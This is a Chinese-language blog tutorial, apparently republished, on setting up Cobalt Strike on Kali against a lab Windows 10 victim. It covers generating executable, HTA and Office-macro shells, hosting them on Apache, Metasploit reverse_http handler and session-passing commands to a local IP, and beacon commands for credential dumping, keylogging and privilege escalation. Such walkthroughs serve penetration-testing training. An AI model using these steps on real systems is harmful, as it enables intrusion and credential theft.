Cobalt Strike从入门到放弃 |
您所在的位置:网站首页 › kali从入门到入狱PDF › Cobalt Strike从入门到放弃 |
Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。 环境介绍kali linux 2021Cobalt Strike4.3windows10(受害机)在kali中安装Cobalt Strike在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。 进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。 这样便启动了Cobalt Strike 如上会提示登录 这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令: ./teamserver 192.168.123.33 pass66 #./teamserver kali的ip 登录密码生成shell首先配置监听 和msfconsole类似,Cobalt Strike也要配置监听。 Cobalt Strike——Listeners——Add 相关参数说明: 参数 说明 name 监听任务的名称 可随意 payload 监听的方式 支持http https TCP 等 HTTPS HOSTS 主机IP地址 Host Rotation Strategy 主机转移策略 一般默认即可 生成shell Attacks—Packages——windows ececutable 配置windows平台下的shell 保存生成的shell 参数 说明 HTML Application 基于http方式的攻击,如受害者打开网站即可获得shell MS Office Macro office宏攻击,如打开word文档即可获得shell Payload Generator 其他方式的payload,如C python vb windows ececutable 生成windows平台下的shell Shell上线 将生成的shell放到/var/www/html,并启动apache服务器 cp kali.exe /var/www/html service apache2 start当目标主机下载并运行shell后,我们便可以看到回弹。 对目标主机的操作interact 命令模式当我们点击interact后,便会和msfconsole一样,进入命令模式。 现列出常用的命名 参数 说明 argue 匹配进程的欺骗参数 blockdlls 阻止子进程中的非Microsoft DLL browserpivot 设置浏览器会话 cancel 取消正在进行的下载 cd 改变目录位置 checkin 呼叫总部并发布数据 chromedump 从Google Chrome恢复凭据 clear 清除信标队列 connect 通过TCP连接到目标 covertV** 部署隐蔽V**客户端 cp 复制文件 dcsync 从DC提取密码哈希 desktop 查看目标桌面并与之交互 dllinject bbskali.cn dllload 将反射DLL注入进程 download 文件下载 downloads 列出正在下载的文件 drives 列出目标上的驱动器 elevate 在提升的上下文中生成会话 exit 关闭当前连接 getprivs 对当前令牌启用系统权限 getsystem 提升系统权限 getuid 获取用户ID hashdump 导出hash密码 keylogger 记录键盘 kill Kill 掉进程 logonpasswords 使用mimikatz转储凭据和哈希 ls 列出文件列表 bbskali.cn make_token 创建一个 token mimikatz 运行神器 mimikatz mkdir 创建一个目录 mv 移动文件 net 网络和主机枚举 upload 上传文件 如获取C盘文件信息cd / ls和目标屏幕交互desktop其他菜单操作由于比较多,就不一个个说了。把常用的几个菜单说说。 可视化的文件浏览Explore-File Browser 对局域网内所有设备扫描 显示目标的所有进程 Cobalt Strike与Msfconsole联动首先我们在Cobalt Strike中创建一个新的Foreign Http监听 然后在msfconsole中配置监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set LHOST 192.168.123.33 set LPORT 4444 exploit返回Cobalt Strike,选择目标,右键Spawn选择我们前面配置的Foreign Http监听 这时,我们返回到msf中便可以看到成功得到回弹。 将msf会话转移到Cobalt Strike一样,我们先建立一个http的监听 因为在msf中我们已经获得了session 在其配置如下: use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set LHOST 192.168.123.33 set LPORT 5555 set SESSION 1 runset DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的 。 然后我们返回到Cobalt Strike这时便可以看到会话了 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/2592.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |